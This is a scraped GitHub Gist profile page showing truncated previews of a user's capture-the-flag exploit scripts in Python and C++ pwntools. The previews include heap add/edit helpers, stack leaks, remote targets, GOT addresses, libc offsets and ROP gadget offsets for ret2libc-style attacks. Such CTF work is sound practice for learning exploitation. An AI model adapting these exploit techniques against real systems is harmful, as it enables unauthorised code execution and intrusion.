Skip to content

Instantly share code, notes, and snippets.

View hkraw's full-sized avatar

Harsh khuha hkraw

View GitHub Profile
#include <pwntools>
#include <string>
#include <vector>
#include <iostream>
using namespace pwn;
//auto io = Process("./a.out");
auto io = Remote("65.1.92.179", 49155);
void add(uint32_t idx, uint32_t size, const std::string& bytes) {
from pwn import *
from time import sleep
def add(index,size,data):
io.sendline("1")
io.sendline(str(index))
io.sendline(str(size))
io.sendline(data)
def edit(index,data):
io.sendline("2")
from pwn import *
if __name__ == "__main__":
io = process("./a.out")
io.sendlineafter("age: ","+")
io.sendlineafter("n]: ","y")
io.recvuntil("is ")
stack_leak = int(io.recvuntil(",")[0:-1], 10)
print(f"[+] Stack Leak: {hex(stack_leak)}")
@hkraw
hkraw / fs-2.cc
Created February 21, 2021 06:30
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
using namespace pwn;
auto io = Remote("13.233.166.242", 49157);
void add(uint32_t idx, uint32_t size, const std::string &data,
const std::string &s = "\n") {
from pwn import *
def add(idx, size, data,s='\n'):
io.sendlineafter("exit"+s,"1")
io.sendlineafter("index: ",str(idx))
io.sendlineafter("size: ",str(size))
io.sendafter("input: ",data)
def edit(idx, data,s="\n"):
io.sendlineafter("exit"+s,"2")
@hkraw
hkraw / fs-1.cc
Created February 20, 2021 20:22
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
using namespace pwn;
// auto io = Process("./FS-1");
auto io = Remote("13.126.21.122", 49160);
void add(uint32_t idx, uint32_t size, const std::string &data,
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
using namespace pwn;
uint64_t strlen_got = 0x409068;
uint64_t libc_strlen = 0x18b660;
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
using namespace pwn;
auto io = Remote("challenges.ctfd.io", 30458);
uint64_t memset_got = 0x404038;
uint64_t win_function = 0x4011C2;
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
using namespace pwn;
enum TYPE { PERSONAL, BUSINESS, ADVERTISEMENT };
class Handle {
public:
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
using namespace pwn;
uint64_t L_pop_rdi = 0x21112;
uint64_t offset_system = 0x453a0;
uint64_t offset_exit = 0x3a040;